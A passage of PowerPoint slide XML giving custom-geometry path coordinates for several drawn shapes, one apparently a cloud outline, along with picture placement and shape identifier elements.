                    <a:pt x="417579" y="69250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418717" y="67929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419875" y="66629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421541" y="65613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423736" y="64942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425504" y="64373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428125" y="63885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434993" y="63032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438204" y="62707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462550" y="39339"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462812" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441150" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462812" y="62463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441150" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439443" y="78069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437472" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432369" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431716" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430767" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="62463"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="427617" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422395" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417193" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406789" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403030" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400733" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400733" y="44195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402725" y="44195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404513" y="43504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407439" y="42529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415368" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415133" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419469" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462550" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460048" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454521" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449740" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443660" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436615" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437452" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427617" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="507292" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="485387" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485387" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507292" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507292" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="551062" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529137" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529137" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551062" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5510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08C56BAE-8FB4-75A1-3146-3DD4E986BA7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4818929" y="2993075"/>
              <a:ext cx="1285240" cy="821690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1285239" h="821689">
                  <a:moveTo>
                    <a:pt x="538580" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498911" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477551" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456191" y="9111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447037" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436357" y="15186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389059" y="41002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350916" y="74412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344813" y="83524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338710" y="91117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332607" y="100229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328030" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323453" y="116934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317350" y="126046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314299" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308196" y="154900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305144" y="165530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303619" y="174642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300567" y="195902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300567" y="223238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291413" y="224756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280733" y="226275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271578" y="229312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260898" y="232350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253270" y="236905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244115" y="242980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236487" y="247536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212075" y="277908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="314355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198344" y="326504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="332579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="341691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189189" y="338653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176984" y="335616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164778" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154098" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106800" y="341691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54926" y="367507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25937" y="397880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6102" y="435846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="463181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="493553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10680" y="534556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33565" y="569485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67131" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79337" y="605932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93069" y="610488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106800" y="616562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122057" y="619600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137315" y="621118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154098" y="622637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163252" y="622637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173932" y="621118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173932" y="634786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175458" y="643898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175458" y="653009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178509" y="662121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180035" y="669714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186138" y="687938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190715" y="695531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195292" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224281" y="741090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254795" y="766906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289887" y="786649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329556" y="800316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363122" y="806391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373802" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384482" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396688" y="809428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408894" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421099" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445511" y="804872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457717" y="801835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479077" y="795760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491283" y="792723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500437" y="788167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511117" y="782093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520272" y="777537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529426" y="771462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540106" y="765388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547735" y="759313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556889" y="753239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564518" y="745646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570620" y="753239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578249" y="762351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585878" y="768425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595032" y="776018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604186" y="782093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613341" y="789686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624021" y="794242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636227" y="800316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648432" y="804872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660638" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="812465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701833" y="818540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715564" y="820058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729296" y="820058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744553" y="821577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782696" y="818540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834571" y="806391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880343" y="786649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903228" y="768425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913908" y="759313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935269" y="727422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942897" y="703124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950526" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956629" y="706161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982566" y="706161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991720" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002400" y="703124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011555" y="700087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020709" y="695531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035966" y="686419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042069" y="678826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049698" y="672752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055801" y="666677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060378" y="659084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063429" y="649972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068007" y="642379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="633267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="624155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="615044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="602895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069532" y="592264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080212" y="593783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092418" y="595302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103098" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115304" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165653" y="589227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209899" y="571003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255671" y="531519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263299" y="517852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270928" y="505703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277031" y="492035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283134" y="461662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284659" y="446476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283134" y="431290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270928" y="388768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244991" y="350802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209899" y="323467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196167" y="314355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180910" y="308281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165653" y="303725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148870" y="299169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115304" y="296132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104624" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093944" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083264" y="299169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="302206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="262722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="250573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069532" y="239943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066481" y="229312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063429" y="220201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060378" y="209570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051224" y="188309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042069" y="170086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035966" y="160974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029864" y="153381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023761" y="144269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016132" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010029" y="129083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002400" y="121490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994772" y="115415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987143" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968835" y="95673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930691" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868137" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857457" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837622" y="65300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819314" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801005" y="72894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782696" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749130" y="92636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735399" y="103266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720141" y="113897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704884" y="89599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695730" y="78968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686576" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665215" y="48596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653010" y="39484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639278" y="30372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625547" y="24298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613341" y="18223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598083" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584352" y="7593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569095" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538580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82639A9C-94A2-0A3D-7AC7-31D5771C498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9443" y="3012817"/>
              <a:ext cx="1209899" cy="754757"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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0D7FBDF6-CE77-8105-1AC0-B950651880F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9774" y="2984329"/>
              <a:ext cx="1303009" cy="839470"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E9E6C226-E312-AE22-9B89-E6FB8C747B27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6355039" y="2170287"/>
              <a:ext cx="86360" cy="466725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="86360" h="466725">
                  <a:moveTo>
                    <a:pt x="19631" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64934" y="454558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86075" y="466599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19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4" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4FF2E95-7C44-3D22-E1CB-8A5A856FE9E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0140" y="2067936"/>
              <a:ext cx="662932" cy="565939"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1A5DEB9F-775A-B7AE-A983-862A058867A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6365005" y="2062678"/>
              <a:ext cx="673735" cy="576580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="602388" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="105421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70805" y="576433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105039" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73826" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10384" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35161" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594112" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603275" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602388" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="78392" y="565961"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73826" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78510" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="662923" y="465147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105039" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673201" y="472539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672747" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="667302" y="464391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="671980" y="464391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672747" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672093" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671980" y="464391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="603275" y="5920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="594112" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599388" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662810" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671980" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603275" y="5920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="9614" y="108451"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="10269" y="112807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10384" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="35161" y="108451"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35161" y="108451"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="594112" y="5920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="594681" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599388" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
